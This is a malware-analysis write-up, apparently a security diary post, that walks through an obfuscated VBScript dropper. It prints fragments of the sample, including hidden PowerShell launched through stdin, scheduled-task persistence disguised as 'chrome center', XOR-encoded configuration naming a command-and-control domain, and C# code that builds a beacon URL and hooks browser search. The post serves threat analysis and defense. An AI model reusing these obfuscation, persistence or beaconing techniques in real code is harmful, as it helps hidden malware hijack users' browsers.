In the FOR610[1] class, we learn how to perform malware analysis. The training focuses on Windows PE files but in the real world, malware samples use multiple technologies to perform malicious actions. I spotted a VBScript file (I don’t know where it’s coming from, probably a phishing campaign). The script has been flagged by only one(!) AV product on VT (SHA256: 81e4e91b8a841311b28b42951d53ec6ce471227480ca97c91c2aa1eeda6dad30[2]).

The VBScript implements a simple but effective obfuscation technique: The attacker implemented search/replace operations to inject extra code into the script. Example:

1: pr = "WyI2NTM0ODcxMTQx ... VRHZFhTMGslM0QiXQ=="
2: pls = db64("DQoNCiRqX1Zhcj0kbnVsbDsNCiRvaz0kdHJ … JCX0NCgkJfQ0KDQoJfSBjYXRjaHt9DQp9DQoNCg==")
3: pls = Replace(pls, db64("cmVwbGFjZV9wYXJhbQ=="), pr)
4: pls = Replace(eb64(pls), vbLf, "")

The variable "pls" contains the Base64-encoded PowerShell scripts, and, on line 3, the string “replace_param” ("cmVwbGFjZV9wYXJhbQ==") is replaced with a Base64-encoded data in the variable 'pr'. Here are the very first lines of the initial script:

1: $j_Var=$null;
2: $ok=$true
3: $rLD_v = "29";
4: $VRPar = "replace_param";
5: $ascEnC_str=[System.Text.Encoding]::ASCII;

The added data is a simple array:

["6534871141755962984",1678332192,"OTEwODQPBAMMDA4AAQwFDgQFAQILCAgMSAAEBQ8MCk0BDgMBAgMKBQAATGdXS0k%3D"]

This array is used here in the PowerShell script:

1: $j_Var=$ascEnC_str.GetString([System.Convert]::FromBase64String($VRPar)) | ConvertFrom-Json;
2: $di=$j_Var[2];
3: $is=$j_Var[1];
4: $u=$j_Var[0];

The deobfuscated code is now located in $pls. This code is injected into another script using the same technique:

1: cts = db64("JGQ9InJlcGxhY2VfcGx1YjY0IjsNCiR0YS ... CAgIH0gY2F0Y2h7fQ0KfQ0KDQpleGl0Ow==")
2: cts = Replace(cts, db64("cmVwbGFjZV9wbHViNjQ="), pls)

The PowerShell is launched via a nice trick:

1: Set so = CreateObject("WScript.Shell")
2: set ex = so.Exec(db64("Y21kLmV4ZSAvYyBwb3dlcnNoZWxsIC1XaW5kb3dTdHlsZSBIaWRkZW4gLQ=="))
3: ex.StdIn.Write cts & VbCrLf

“Y21kLmV4ZSAvYyBwb3dlcnNoZWxsIC1XaW5kb3dTdHlsZSBIaWRkZW4gLQ==“ decodes as “cmd.exe /c powershell -WindowStyle Hidden -“.

Did you see the trailing dash? PowerShell expects the code to execute from STDIN, see line 3.

This PowerShell script will implement its persistence via a scheduled task:

 1: $d="replace_plub64";
 2: $ta = New-ScheduledTaskAction -Execute 'cmd' -Argument "/c powershell -WindowStyle Hidden -E `"$d`"";
 3: $tt = New-ScheduledTaskTrigger -Once -At (Get-Date).AddSeconds(45) -RepetitionInterval (New-TimeSpan -Minutes 50);
 4: Register-ScheduledTask -TaskName "chrome center" -Action $ta -Trigger $tt -Description "Chrome center"; 
 5: $tsn = @("engine", "policy", "about", "sync", "customize", "accessibility", "data", "help", "find", "zoom", "profile", "nav", "glass", "control", "window", "panel", "tab", "view", "cast", "history", "flags", "bookmarks", "conf", "storage", "tools",  "settings", "support", "tele")
 6: for ($i=0 ; $i -lt $tsn.length ; ++$i) {
 7:    try {
 8:       $ts = "chrome {0}" -f $tsn[$i];
 9:       Unregister-ScheduledTask -TaskName $ts -Confirm:$false
10:    } catch{}
11: }
12: exit;

Note that the script removes scheduled tasks based on the same naming convention.

Let’s now have a look at the variable "$d" which contains the payload executed by the scheduled task!

The PowerShell contains some CSharp code that is compiled on the fly:

csc.exe /noconfig /fullpaths @"C:\Users\user01\AppData\Local\Temp\z2fptyrq.cmdline"

Here are the compilation details extracted from the file z2fptyrq.cmdline:

\xfeff/t:library /utf8output /R:"System.dll"
/R:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" 
/R:"C:\Windows\assembly\GAC_32\System.Web\2.0.0.0__b03f5f7f11d50a3a\System.Web.dll" /R:"Microsoft.CSharp.dll" 
/R:"C:\Windows\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll" 
/R:"C:\Windows\assembly\GAC_MSIL\WindowsBase\3.0.0.0__31bf3856ad364e35\WindowsBase.dll" 
/out:"C:\Users\user01\AppData\Local\Temp\z2fptyrq.dll" 
/D:DEBUG /debug+ /optimize- "C:\Users\user01\AppData\Local\Temp\z2fptyrq.0.cs”

Here is the PowerShell code:

1: $id = get-random
2: $assemblies = ("System.Web", "Microsoft.CSharp", "PresentationCore", "WindowsBase")
3: $code = @" ... "@
4: Add-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp -IgnoreWarnings
5: $fr = "[Application.Program$id]::run";
6: $fs = "[Application.Program$id]::stop";

More runtime parameters are obfuscated in an XOR’d string:

1: $eb=[System.Convert]::FromBase64String("RUVwSTMeZxMhQSooFRZQICsELE ... MqNRU7UmsgCCwTahFSFA==");
2: $k=$eb[0..4];
3: $bs=$eb[5..$eb.length];
4: $rs=@();
5: $j=0;
6: [array]::Resize([ref]$rs,$bs.length);
7: foreach($b in $bs) {$rs[$j++]=($b -bxor $k[$j%$k.length])}
8: $ja=$a.GetString($rs) | ConvertFrom-Json;

The XOR key is based on the 4-first bytes of the "$eb" variable. Here is the content of "$ja":

 1: PS C:\Users\REM> $ja
 2: chrome_center
 3: background.js
 4: temp.zip
 5: rtowatchship.xyz
 6: name='chrome.exe'
 7: load-extension
 8: chrome
 9: C:\Program Files\
10: C:\Program Files (x86)\
11: Google\Chrome\Application\chrome.exe
12: opera
13: name='opera.exe'
14: Opera\launcher.exe
15: \Programs\
16: taskkill /F /IM opera.exe /T

It was impossible to detonate the complete script in my sandbox (and compile the CSHARP code)… However, the code discloses interesting behaviors:

 1: public static void run(string domain, string uid, string ist, string tid)
 2: {
 3:    if (thread != null && thread.IsAlive)
 4:    {
 5:        return;
 6:    }
 7:    isRun = true;
 8:    srvUrl = String.Format("https://goog.{0}/?tid={1}&u={2}&agec={3}", domain, tid, uid, ist);
 9:    thread = new Thread(new ThreadStart(Program88.runThread));
10:    thread.IsBackground = true;
11:    thread.SetApartmentState(ApartmentState.STA);
12:    thread.Start();
13: }

The domain comes from the XOR-encoded data above: rtowatchship[.]xyz. A browser is started and, at the end of the function laughing it, there is a reference to this function:

hookSearchNavigation(hwnd, valuePattern, searchKeyword, true, referrer)

Microsoft UI Automation is a tool that provides an abstracted model of the UI, and allows a client application to both investigate and manipulate the UI of all running applications on the system.

[Update] I was able to detonate the last piece of PowerShell script in my sandbox after some code cleanup, but there is no data returned by rtowatchship[.]xyz.I don't have lot of experience with UI Automation. If you can share some details about the CSharp code, please share with us!

[1] https://for610.com
[2] https://bazaar.abuse.ch/sample/81e4e91b8a841311b28b42951d53ec6ce471227480ca97c91c2aa1eeda6dad30/
[3] https://learn.microsoft.com/en-us/windows/win32/api/uiautomationclient/nn-uiautomationclient-iuiautomation

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key